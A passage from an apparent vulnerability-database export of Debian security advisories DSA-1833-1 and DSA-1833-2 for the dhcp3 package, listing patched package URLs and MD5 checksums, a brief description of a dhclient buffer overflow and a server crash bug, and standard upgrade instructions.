http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_powerpc.deb\n Size/MD5 checksum: 130298 d93a5ddd00026cbaccd7a43c12d7eed5\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_powerpc.deb\n Size/MD5 checksum: 204226 b9c8f25ae0502d86a0db2a3ebeacee88\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_powerpc.deb\n Size/MD5 checksum: 299368 5022ae153ee18c6684c1b5a8b7c78a8f\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_sparc.deb\n Size/MD5 checksum: 202674 3219218e6e886505c7268e30344a199e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_sparc.deb\n Size/MD5 checksum: 125748 c3678c9c265ad4288a77147d99038b33\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_sparc.deb\n Size/MD5 checksum: 95246 db0c1035d5aefd6fc9a1682c3ea6fefb\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_sparc.deb\n Size/MD5 checksum: 296420 2a73341aa7331f0ab4038fc3587850bf\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_sparc.deb\n Size/MD5 checksum: 268822 6a6380bdd4dfc204e602f86c3f5e2ae9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_sparc.udeb\n Size/MD5 checksum: 154910 6dc0420162294571d894ed490d569fe9\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1.orig.tar.gz\n Size/MD5 checksum: 798228 fcc19330a9c3a0efb5620409214652a9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1-6+lenny2.diff.gz\n Size/MD5 checksum: 128880 72d4201330b347bfd5ccb15cad39c98f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1-6+lenny2.dsc\n Size/MD5 checksum: 1488 595d2c450fe04edac8e5fcf916480a84\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp-client_3.1.1-6+lenny2_all.deb\n Size/MD5 checksum: 22976 0216788c7652496df9d297d3df2a81e7\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_alpha.deb\n Size/MD5 checksum: 394400 cb8559b314619922a91374579d6959c4\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_alpha.deb\n Size/MD5 checksum: 148276 a8a666404ecf773eaeaab5a2423b540e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_alpha.deb\n Size/MD5 checksum: 348508 cfc96c8147d27237b57e4e698f393cda\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_alpha.deb\n Size/MD5 checksum: 127480 989117e4e0bd1b90cbd5cd0ec06377d0\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_alpha.deb\n Size/MD5 checksum: 271974 b36ad4833551063757e31562c713d4ae\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_alpha.udeb\n Size/MD5 checksum: 215130 326aaed7e5144102deed214c5ab6a14c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_alpha.deb\n Size/MD5 checksum: 333764 b8ebbb4d8a8ac528a685490483da09f1\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_amd64.deb\n Size/MD5 checksum: 358390 68dccbc7e63ffb59c9ef2af3bfe4c7b3\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_amd64.deb\n Size/MD5 checksum: 245198 4cd491f7be9374393a4d9c8687b8276a\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_amd64.deb\n Size/MD5 checksum: 120404 4dfcb0d1f42836cac6d5679a1abdfcb9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_amd64.deb\n Size/MD5 checksum: 313190 5da5b48221028fff8d2fe89370ea051d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_amd64.deb\n Size/MD5 checksum: 310328 f6a3ddc984847b078c9e93ad95d82ae4\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_amd64.deb\n Size/MD5 checksum: 114232 1980df61d75ea40ebc82c22c7005b3ea\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_amd64.udeb\n Size/MD5 checksum: 188412 91cf6d4362473d908f108a45c6e1073c\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_arm.deb\n Size/MD5 checksum: 103692 0c3678563a2fadc12054811d3c5df5be\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_arm.deb\n Size/MD5 checksum: 336338 22a205bb36afdb50717e1187c644ca7f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_arm.deb\n Size/MD5 checksum: 292856 d64219e9efe77445c5b3c2a5834a5f16\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_arm.deb\n Size/MD5 checksum: 226548 30e51575f5aad4a17cda75b6277c2298\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_arm.deb\n Size/MD5 checksum: 108874 71e3bc13d6e59a98f32f3466291becac\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_arm.udeb\n Size/MD5 checksum: 170056 460b6cb3d07249b2bf7a554504815cc3\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_arm.deb\n Size/MD5 checksum: 291164 768c6b628b9285007277a884342fff2d\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_armel.deb\n Size/MD5 checksum: 293770 aff3c87d606cf2b7cfc8cc2b6a433ee0\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_armel.deb\n Size/MD5 checksum: 338686 20e3cf59a67c8d746918378e486adc72\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_armel.deb\n Size/MD5 checksum: 109692 228381c7fbead4e0b3e140647c956015\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_armel.deb\n Size/MD5 checksum: 103172 04a01c3e2e5eb34b9ca9b89ba6ff0704\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_armel.deb\n Size/MD5 checksum: 227394 7afa7ddb6b23887f8a11ae1599c521b6\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_armel.deb\n Size/MD5 checksum: 293020 00ed8969e284da3a687e4e6421dbdc3b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_armel.udeb\n Size/MD5 checksum: 170800 2e74568b6974af18c54a8f276157240f\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_hppa.deb\n Size/MD5 checksum: 116212 bbc799a4068272efbd27845c0b91de4d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_hppa.udeb\n Size/MD5 checksum: 194972 d86d92f993fd03f2177847d0384cdc8e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_hppa.deb\n Size/MD5 checksum: 324480 169c91330d7627dd539342a950c0ede1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_hppa.deb\n Size/MD5 checksum: 315718 e86d7975c3341d02f319f7de97b13045\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_hppa.deb\n Size/MD5 checksum: 251748 956834560fde2009ae81efba433ab9b1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_hppa.deb\n Size/MD5 checksum: 127710 f67185d6696ef7104a888053488234f8\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_hppa.deb\n Size/MD5 checksum: 369580 cf511b62e1cbced8373103dd23604631\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_i386.deb\n Size/MD5 checksum: 332434 deceed031e4ec70f9a89a3f9f1aa83a6\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_i386.udeb\n Size/MD5 checksum: 167142 890e95b663c536bd4794e4eeaf7e4620\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_i386.deb\n Size/MD5 checksum: 106664 e9a85ff16968a9b0a982f2650d09b97e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_i386.deb\n Size/MD5 checksum: 224288 ccaea8e386efccf4a9a7b5a66368a18b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_i386.deb\n Size/MD5 checksum: 286932 acd0bd92af229ba24bb9e426e518144f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_i386.deb\n Size/MD5 checksum: 290520 41251b845417290082cead454420009a\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_i386.deb\n Size/MD5 checksum: 102132 40ccebf82e99c1f2228d0304c7c10bb0\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_ia64.deb\n Size/MD5 checksum: 400296 447643661f0ef198381636421a817e15\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_ia64.deb\n Size/MD5 checksum: 347478 0ee8f2058fca1d30fdcb4eed2e82b6b1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_ia64.deb\n Size/MD5 checksum: 159842 12d61f96202f3f68b9aff09424d79348\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_ia64.deb\n Size/MD5 checksum: 508044 130ffd524faa48178f124befdc150e47\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_ia64.deb\n Size/MD5 checksum: 464766 bf7266a768cc90bd76c785624cb4089d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_ia64.udeb\n Size/MD5 checksum: 289288 ee79b20eefaf229fb46ada9bc6ae56bf\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_ia64.deb\n Size/MD5 checksum: 155048 8ecc258935ffd55300285fc775d9f1b9\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_mips.deb\n Size/MD5 checksum: 359176 fb5bd87ef5481f1f43c9a45dfcd3ce37\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_mips.deb\n Size/MD5 checksum: 309030 90233c8ed44269bba30f16b0e8a84450\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_mips.deb\n Size/MD5 checksum: 245844 16982508add38de5d1dc7e465e484d14\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_mips.deb\n Size/MD5 checksum: 114538 291ed9f1bc54e3b8082ca4633185796c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_mips.deb\n Size/MD5 checksum: 314358 270b38430ca3b97245c29ac4dc314172\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_mips.udeb\n Size/MD5 checksum: 188178 334dd27da8522f16bf58ac31e4d3dac2\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_mips.deb\n Size/MD5 checksum: 124312 aef53193ecfafb6c1433223f19242a35\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_mipsel.deb\n Size/MD5 checksum: 362162 67743cf382e17cfab714158bb0f37561\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_mipsel.deb\n Size/MD5 checksum: 247664 b5494e175f7be190ddb2390d2b55ca79\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_mipsel.deb\n Size/MD5 checksum: 310866 6387812c812dafa3b63ed7b139c48f74\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_mipsel.deb\n Size/MD5 checksum: 116224 bf5038fb4e9d79beea543376f91a5404\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_mipsel.udeb\n Size/MD5 checksum: 190284 1da972b8dd8e57d7ed1e62b387329d43\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_mipsel.deb\n Size/MD5 checksum: 317228 9df2929f942d894260e0783cba8668c0\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_mipsel.deb\n Size/MD5 checksum: 125528 34a0a833a1d5626232a7f6b0891d6fa9\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_powerpc.deb\n Size/MD5 checksum: 305096 f3d385927548fe52fde1070280bda9a9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_powerpc.deb\n Size/MD5 checksum: 111500 9d03e2dc815e1f2bb383f677aaf86eb9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_powerpc.udeb\n Size/MD5 checksum: 183812 82bce24908b4088c62c9d6d7622d3ac2\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_powerpc.deb\n Size/MD5 checksum: 310594 97b0fd83d73c1aec8784e97a92b77ee1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_powerpc.deb\n Size/MD5 checksum: 354430 0e7fc5b85c1474674e8aa1f506bbf815\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_powerpc.deb\n Size/MD5 checksum: 118796 2af645bbf54897306a52a7b072cdded1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_powerpc.deb\n Size/MD5 checksum: 241116 7748b01950150c4cec91d2f361c5e403\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_s390.deb\n Size/MD5 checksum: 303410 0681214517ad4e1746d0f30a6af3854f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_s390.deb\n Size/MD5 checksum: 348930 cda6066a1d5cfa599383e38201b662c0\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_s390.deb\n Size/MD5 checksum: 112420 cb2a4679d4d187e6373df2e8fb7de53e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_s390.udeb\n Size/MD5 checksum: 182114 55db5122f2cb6acc7169911f40c5646a\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_s390.deb\n Size/MD5 checksum: 117568 6e16df93aabfcb6892de03e3c7d9c35b\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_s390.deb\n Size/MD5 checksum: 239446 5c93734c0bd94ef02c726730418ab49c\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_s390.deb\n Size/MD5 checksum: 303678 5924002054a4233ea16e4e8769821f49\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_sparc.udeb\n Size/MD5 checksum: 161504 f4ae7e33ec0fae6818f0cae625925ee9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_sparc.deb\n Size/MD5 checksum: 218292 f4b7091a070b4dc413eb4d3e319b88f9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_sparc.deb\n Size/MD5 checksum: 109326 fe50b4989d1b397347621c5c4fef23af\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_sparc.deb\n Size/MD5 checksum: 101564 60fd708e4dcda554af9ede9b9cc396a9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_sparc.deb\n Size/MD5 checksum: 280070 7ee763f435a4881ac7f719030e59b8d0\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_sparc.deb\n Size/MD5 checksum: 283656 2a79cfc252c6a772d16e34845984a5ac\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_sparc.deb\n Size/MD5 checksum: 325588 168e42992477d7e845d1d9bfde4b1cad\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2009-07-14T19:33:41", "published": "2009-07-14T19:33:41", "id": "DEBIAN:DSA-1833-1:FBD4D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00147.html", "title": "[SECURITY] [DSA 1833-1] New dhcp3 packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:13:22", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1833-2 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nAugust 25, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : dhcp3\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2009-0692 CVE-2009-1892\nCERT advisory : VU#410676\n\nThe previous dhcp3 update (DSA-1833-1) did not properly apply the\nrequired changes to the stable (lenny) version. The old stable (etch)\nversion is not affected by this problem.\n\nThe original advisory description follows.\n\nSeveral remote vulnerabilities have been discovered in ISC's DHCP\nimplementation:\n\nIt was discovered that dhclient does not properly handle overlong\nsubnet mask options, leading to a stack-based buffer overflow and\npossible arbitrary code execution. (CVE-2009-0692)\n\nChristoph Biedl discovered that the DHCP server may terminate when\nreceiving certain well-formed DHCP requests, provided that the server\nconfiguration mixes host definitions using "dhcp-client-identifier"\nand "hardware ethernet". This vulnerability only affects the lenny\nversions of dhcp3-server and dhcp3-server-ldap. (CVE-2009-1892)\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 3.1.1-6+lenny3.\n\nWe recommend that you upgrade your dhcp3 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1.orig.tar.gz\n Size/MD5 checksum: 798228 fcc19330a9c3a0efb5620409214652a9\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1-6+lenny3.dsc\n Size/MD5 checksum: 1488 b884753ce46061cc6e0e6a783d7c24a3\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1-6+lenny3.diff.gz\n Size/MD5 checksum: 128921 178f7799fbe3e8fb5a0472a8060bebf7\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp-client_3.1.1-6+lenny3_all.deb\n Size/MD5 checksum: 23010 e772483a84fdca84407e39556188a13e\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_alpha.deb\n Size/MD5 checksum: 148302 296381030181bf29e5185823472c34c7\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_alpha.deb\n Size/MD5 checksum: 348542 910f44119d0cbcefdfdb0496b72f75c0\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_alpha.deb\n Size/MD5 checksum: 272004 63e37fc50ae798ad86713ff354f5b996\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_alpha.deb\n Size/MD5 checksum: 394460 a77802ce027f350aed83be710c92fa9f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_alpha.udeb\n Size/MD5 checksum: 215132 ea9207b439e373b7cda0633600fc2a66\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_alpha.deb\n Size/MD5 checksum: 127514 f1287179244c1684b1a892c187624425\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_alpha.deb\n Size/MD5 checksum: 333782 713d3ad0235144a0537d747a66766b6a\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_amd64.deb\n Size/MD5 checksum: 310356 6fb09a20cce949a6edd1a9a628863a2d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_amd64.deb\n Size/MD5 checksum: 114266 bb511a3be6b474ba6233a00bd70d52b3\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_amd64.udeb\n Size/MD5 checksum: 188422 f2aaca0e2a93c0b3647d6cebc2dc515e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_amd64.deb\n Size/MD5 checksum: 358418 15b92a206a5f782b91ef21a1cb89d8c1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_amd64.deb\n Size/MD5 checksum: 245246 22f8d4e550561f67ac9145e114281d30\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_amd64.deb\n Size/MD5 checksum: 313224 2033f60c749a3e71631a5b153a77ae27\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_amd64.deb\n Size/MD5 checksum: 120442 f86b93961879963e2ea5dc0c5f2d344c\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_arm.deb\n Size/MD5 checksum: 226592 ddba5071d36b331c5a001b67a1b94410\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_arm.deb\n Size/MD5 checksum: 291194 4673741acf27ce06150203ea2cfde77f\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_arm.deb\n Size/MD5 checksum: 103716 cfa5568781f496e02e490ad803b79acc\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_arm.deb\n Size/MD5 checksum: 336408 56415a0df425eace6189f47585a63c01\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_arm.deb\n Size/MD5 checksum: 108910 efb3c5019520090a189212af9b6dcf3d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_arm.deb\n Size/MD5 checksum: 292858 3d1d50251c7953847178a888e6cd91cf\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_arm.udeb\n Size/MD5 checksum: 170066 18a05aa4dfe765c6cc3f99b31e77ecac\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_armel.deb\n Size/MD5 checksum: 227670 41fc7a60258569b01280b594d6293264\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_armel.deb\n Size/MD5 checksum: 337326 266b173681f5c3ea777ae7710cbee665\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_armel.deb\n Size/MD5 checksum: 109000 d04801f4eb76218ff8d8e791acef63ad\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_armel.deb\n Size/MD5 checksum: 103446 dd8d97b1c2364fd1995861454b1fc4a4\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_armel.udeb\n Size/MD5 checksum: 170862 6d71afbbe92432bd1a97c264cfd63561\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_armel.deb\n Size/MD5 checksum: 293940 13e80b7f3b18b939c59193433f72e7b5\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_armel.deb\n Size/MD5 checksum: 293866 e1aaacdd2982b92f1e08126a8a8f2651\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_hppa.deb\n Size/MD5 checksum: 128540 42870a2ec98979a8c59e23bc6fab70f6\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_hppa.deb\n Size/MD5 checksum: 324744 243543866ed9202ce92e9ddc8341fd22\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_hppa.deb\n Size/MD5 checksum: 252142 d0e2729de7ff5da898457d7ee7d1b006\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_hppa.deb\n Size/MD5 checksum: 315534 1657f330bf1b1aacb9b14b419ad003a5\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_hppa.deb\n Size/MD5 checksum: 369264 20f45be07aa3a831d7ea7a3dfaece2d1\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_hppa.udeb\n Size/MD5 checksum: 194978 aa479a0645490f800b342aff92bef059\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_hppa.deb\n Size/MD5 checksum: 116256 dbb01f0c3302f6e35a30e8e5572bf244\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny3_i386.deb\n Size/MD5 checksum: 286974 7129977793036958290bbae514dbf1d6\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny3_i386.deb\n Size/MD5 checksum: 289992 ea449e5b736070fae42f67792eb0e47e\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny3_i386.deb\n Size/MD5 checksum: 223668 d943808ec256705e0950fe652bb6f9b4\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny3_i386.deb\n Size/MD5 checksum: 102102 2522fcb18f0a6f4aa2f8bbc07427e237\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny3_i386.udeb\n Size/MD5 checksum: 167012 e642d66307eff2f9a6ece11291b4a06d\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny3_i386.deb\n Size/MD5 checksum: 332706 647086523305d950e2aebc1805cf2e92\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny3_i386.deb\n Size/MD5 checksum: 106618 c0430456e7d746d57fd58a676147950f\n\nia64 architecture (Intel ia64)\n\n 